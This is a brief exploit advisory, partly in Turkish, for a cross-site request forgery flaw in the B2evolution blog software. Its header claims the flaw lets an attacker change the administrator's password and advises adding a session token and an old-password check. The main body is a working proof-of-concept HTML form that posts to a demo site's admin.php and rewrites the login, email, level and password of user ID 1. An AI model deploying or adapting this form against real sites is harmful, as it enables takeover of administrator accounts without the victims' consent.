< ------------------- header data start ------------------- >

#############################################################

# Application Name : B2evolution

# vulnerable Type : XSRF

# Infection : Admin sifresi degistirebilir .. !

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli,Eski sifre sorulmalidir ..

# author : _iLLeqaL_ ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >



<form id=user_checkchanges class=fform method=post action=http://demo1.b2evolution.net/stable/admin.php>

<input name=user_ID type=hidden value=1 />

<input name=ctrl type=hidden value=users />

<input value=1 maxlength=2 size=2 type=text class=form_text_input field_required name=edited_user_level id=edited_user_level />(Kullanici Seviyesi : [0 - 10])<br>

<input maxlength=100 value=[email protected] size=30 type=text class=form_text_input field_required name=edited_user_email id=edited_user_email />(E-Mail Adresi)<br>

<input value=admin maxlength=20 size=20 type=text class=form_text_input field_required name=edited_user_login id=edited_user_login />(Kullanici Adi)<br>

<input maxlength=50 value=Blogger A size=20 type=text class=form_text_input field_required name=edited_user_nickname id=edited_user_nickname /><br>

<input maxlength=50 autocomplete=off type=password size=20 class=form_text_input name=edited_user_pass1 id=edited_user_pass1 />(Sifre)<br>

<input maxlength=50 autocomplete=off type=password size=20 class=form_text_input name=edited_user_pass2 id=edited_user_pass2 />(Sifre Tekrar)<br>

<input type=submit name=actionArray[userupdate] value=Save ! class=SaveButton />

</form>

< -- bug code end of -- >